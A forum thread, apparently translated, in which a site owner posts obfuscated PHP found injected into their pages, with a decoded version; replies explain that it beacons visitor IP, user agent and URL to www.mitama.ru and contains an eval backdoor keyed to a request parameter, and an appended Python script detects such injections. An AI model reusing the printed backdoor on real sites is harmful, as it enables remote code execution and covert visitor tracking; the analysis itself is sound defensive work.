Foreign code entered on page

This weekend the following code appeared on the pages of my site, but I did not understand what it does; could anyone give me a hand?

Encrypted code...

//###=CACHE START=###
error_reporting(0);

assert_options(ASSERT_ACTIVE, 1);

assert_options(ASSERT_WARNING, 0);

assert_options(ASSERT_QUIET_EVAL, 1); $strings = "as";$strings .= "sert"; $strings(str_rot13('riny(onfr64_qrpbqr("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"));'));
//###=CACHE END=###

Decrypted code...

<?

if (isset($ibv)) { echo $ibv; } else { error_reporting(0);
ini_set("display_errors", "0");
if (!isset($ibv)) {
if(!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]);
if(preg_match('!\S!u', file_get_contents($_SERVER["SCRIPT_FILENAME"]))) $c = "u"; else $c = "w";
$d = $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$u = $_SERVER["HTTP_USER_AGENT"];
$ip = $_SERVER["REMOTE_ADDR"];
$url = "http://www.mitama.ru/get.php?ip=".urlencode($ip)."&d=".urlencode($d)."&u=".urlencode($u)."&c=".$c."&i=1&h=".md5("a38bbad65c3ff868d4185bd8184f2fbb".$d.$u.$c."1");
if(ini_get("allow_url_fopen") == 1) {
$ibv = file_get_contents($url);
} elseif(function_exists("curl_init")) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
$result = curl_exec($ch);
curl_close($ch);
$ibv = $result;
} else {
$fp = fsockopen("www.mitama.ru", 80, $errno, $errstr, 30);
if ($fp) {
    $out = "GET /get.php?ip=".urlencode($ip)."&d=".urlencode($d)."&u=".urlencode($u)."&c=".$c."&i=1&h=".md5("a38bbad65c3ff868d4185bd8184f2fbb".$d.$u.$c."1")." HTTP/1.1\r\n";
    $out .= "Host: www.mitama.ru\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    $resp = "";
    while (!feof($fp)) {
        $resp .= fgets($fp, 128);
    }
    fclose($fp);
    list($header, $body) = preg_split("/\R\R/", $resp, 2);
    $ibv = $body;
}
}
};
if(isset($_REQUEST["p"]) && $_REQUEST["p"] == "baf7d6e5") { eval(stripslashes($_REQUEST["c"])); }
echo $ibv;}
  • Like, this code came out of nowhere?

  • Exactly, this code was inserted from nowhere inside the PHP files. I was able to identify it because the code was in Base64, which I found strange.

  • Look, I tested an excerpt of it and it looked to me like it’s capturing data from visitors to your page. If you try to access www.mitama.ru, nothing appears, but /get.php is blank, signaling that there is something there. And being .ru, it is certainly a bad thing, kkk. I advise you to remove this and run a good antivirus and antimalware on your server.

  • So I already deleted all the pages and uploaded the BKP, but I was curious to know what the code was doing anyway, so thank you for the attention.

  • 1

    It’s a kind of Google Analytics for some hacker, rsrs.

  • I advise you to take a good look at your server and the firewall rules; "fsockopen" is the one that should worry you: fsockopen - Opens an Internet or Unix domain socket connection (http://php.net/manual/en/function.fsockopen.php). If ports are open, that is something to resolve as soon as possible; you can be sure you will be attacked again.

  • @user3010128 Sorry, I’m a bit of a layman on the subject. What should I look at on the server? I use a GoDaddy hosting server.

  • Check with them regarding this "injection" of code that was made on your page, as this is a security flaw in the server rules. One thing is an SQL injection due to a failure in the website’s programming; another is to insert a code snippet into your source, in something already published. Well, it would also be nice to look at the machine you use to develop ;)


1 answer

4


Examining this code very superficially, it can be divided into two parts.

The first of them would be all the lines except the penultimate.

What it does there is basically take information from your server and from the user who opened the page and send this information to http://www.mitama.ru/get.php (just being a Russian site already gives an idea that it is something bad).

From what I could identify, it takes the address that was opened by the user, the User Agent (which contains information about the browser used) and the user’s IP.

It tries to send this information in 3 different ways, through file_get_contents, curl or a socket, depending on which is enabled on the server, and then stores the result in the variable $ibv, which at the end it adds to the page.

So with this it could add any content to your page, but what I read about this is that, since they capture the user agent and IP, they can detect when some crawler from a search engine visits and display different results just for it.

Imagine the Google bot indexing your site, and on each infected page it adds links to their sites, so they get a better rank on Google, while if an ordinary user opens your site it might be that nothing is displayed, making it harder to identify the infection.

In the second part I think there’s an even bigger problem:

if(isset($_REQUEST["p"]) && $_REQUEST["p"] == "baf7d6e5") { eval(stripslashes($_REQUEST["c"])); }

Basically, if a parameter "p" has been passed and it has the correct value, it will run through eval any code that is sent in the parameter "c", allowing them to run arbitrary PHP code remotely on your server.

Now notice that if any user opens your page, it sends your address to the hacker, and then that hacker can send commands for your server to run, i.e., it is basically a botnet that can then be used, for example, for a DDoS attack.
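The two layers described in the question and the answer (the `$strings = "as"; $strings .= "sert"` stager that feeds `str_rot13` output to `assert`, and the decoded beacon-plus-`eval($_REQUEST["c"])` payload underneath) can be triaged statically, without ever executing the PHP. The following Python script is an added example, not code from the original post or from anyone in the thread: it peels the rot13 and base64 layers with regular expressions and then flags the indicators the answer points out (outbound beacon, visitor fingerprinting, `eval` of a request parameter, the `client_check` cookie kill switch). The inner payload used as input is a constructed stand-in modelled on the decrypted code above; the real base64 blob from the site is not reproduced here, and the `build_stager` helper exists only to produce a realistic test input.

```python
"""Static triage of the obfuscated PHP injection discussed above (added example)."""
import base64
import codecs
import re

# Constructed inner payload, modelled on the decrypted code from the page.
# It is NOT the real decoded blob, only a stand-in with the same shape.
INNER_PHP = (
    'if(!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]);\n'
    '$u = $_SERVER["HTTP_USER_AGENT"];\n'
    '$url = "http://www.mitama.ru/get.php?ip=".urlencode($ip);\n'
    '$ibv = file_get_contents($url);\n'
    'if(isset($_REQUEST["p"]) && $_REQUEST["p"] == "baf7d6e5") '
    '{ eval(stripslashes($_REQUEST["c"])); }\n'
    'echo $ibv;'
)


def build_stager(inner_php: str) -> str:
    """Wrap PHP in the same stager layout as the '//###=CACHE START=###' block.
    Test-input helper only: the whole eval(base64_decode("...")) expression is
    rot13-encoded, exactly as in the sample, so the base64 letters are rotated too."""
    b64 = base64.b64encode(inner_php.encode()).decode()
    rotated = codecs.encode(f'eval(base64_decode("{b64}"));', "rot13")
    return (
        "//###=CACHE START=###\n"
        "error_reporting(0);\n"
        "assert_options(ASSERT_ACTIVE, 1);\n"
        '$strings = "as";$strings .= "sert"; '
        "$strings(str_rot13('" + rotated + "'));\n"
        "//###=CACHE END=###"
    )


# Matches: $x = "as"; $x .= "sert"; $x(str_rot13('...'))  -- the dynamic assert() call.
STAGER_RE = re.compile(
    r"""\$(\w+)\s*=\s*"as"\s*;\s*\$\1\s*\.=\s*"sert"\s*;\s*\$\1\s*\(\s*str_rot13\s*\(\s*'([^']*)'\s*\)\s*\)"""
)
# Matches the decoded expression: eval(base64_decode("<b64>"))
EVAL_B64_RE = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*"([A-Za-z0-9+/=]+)"\s*\)\s*\)')


def unwrap_stager(php_source: str):
    """Peel the rot13 + base64 layers statically.
    Returns (decoded_expression, inner_php); inner_php is None if the expression
    is not an eval(base64_decode(...)); returns None if the stager pattern is absent."""
    m = STAGER_RE.search(php_source)
    if not m:
        return None
    expr = codecs.decode(m.group(2), "rot13")
    m2 = EVAL_B64_RE.search(expr)
    if not m2:
        return expr, None
    inner = base64.b64decode(m2.group(1)).decode("utf-8", errors="replace")
    return expr, inner


# Indicators taken from the behaviour described in the answer.
INDICATORS = {
    "dynamic_assert_call": re.compile(r'\$\w+\s*=\s*"as"\s*;\s*\$\w+\s*\.=\s*"sert"'),
    "rot13_eval_b64": re.compile(r"str_rot13\s*\("),
    "eval_of_request": re.compile(
        r"eval\s*\(\s*(?:stripslashes\s*\()?\s*\$_(?:REQUEST|GET|POST|COOKIE)\b"
    ),
    "outbound_beacon": re.compile(
        r'(?:file_get_contents|curl_init|fsockopen)\s*\(\s*(?:\$url|"https?://|"www\.)'
    ),
    "visitor_fingerprint": re.compile(r'\$_SERVER\["(?:HTTP_USER_AGENT|REMOTE_ADDR)"\]'),
    "cookie_kill_switch": re.compile(r"die\s*\(\s*\$_COOKIE\["),
}


def scan_indicators(php_source: str) -> list:
    """Return the sorted names of all indicators present in the given source."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(php_source))


def triage(php_source: str) -> dict:
    """Indicators on the file as found on disk, plus on the unwrapped payload."""
    report = {"outer": scan_indicators(php_source), "inner": []}
    unwrapped = unwrap_stager(php_source)
    if unwrapped and unwrapped[1] is not None:
        report["inner_php"] = unwrapped[1]
        report["inner"] = scan_indicators(unwrapped[1])
    return report


if __name__ == "__main__":
    sample = build_stager(INNER_PHP)  # constructed infected file
    result = triage(sample)
    print("outer indicators:", result["outer"])
    print("inner indicators:", result["inner"])
    print("unwrapped payload:\n" + result.get("inner_php", "<none>"))
```

Run against a web root, the outer indicators alone (string-built `assert` plus `str_rot13`) are enough to flag a file for review even when the payload changes; the unwrapped text then tells you which host the beacon reports to and whether a remote `eval` backdoor is present, which is the part that warrants rotating credentials and not just restoring from backup.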
